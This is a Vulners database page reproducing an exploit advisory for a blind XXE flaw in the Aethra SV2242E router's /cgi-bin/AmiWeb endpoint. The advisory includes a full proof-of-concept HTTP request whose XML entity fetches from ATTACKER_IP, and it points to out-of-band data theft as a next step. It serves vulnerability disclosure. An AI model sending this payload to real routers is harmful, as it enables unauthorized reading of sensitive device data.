Vulners
Lucene search
Aethra SV2242E XXE Injection Vulnerability
# Author : Ahmed Sultan
# Email : [email protected]
# Vuln. software : Aethra SV2242E
# Vendor site : aethra.it
# CVE : Requested , but haven't been assigned yet
# tested on : ATOS 5.6.x
The bug rise because of the remote user input to "/cgi-bin/AmiWeb" is not
sensitized before being parsed which cause the availability of blind XXE
attack that might result in reading sensitive data from the router system
A proof of concept
POST /cgi-bin/AmiWeb HTTP/1.1
Content-type: application/xml
Host: ROUTER_IP
Content-Length: 155
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ATTACKER_IP/0x4148_jnk">
%remote;
%int;
%trick;]>
That will result in HTTP request to ATTACKER_IP/0x4148_jnk
further exploitation might be done by using OOB (Out Of Bound) XXE attacks
to reach sensitive data on the server
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Dec 2015 00:00Current
7.5High risk
Vulners AI Score7.5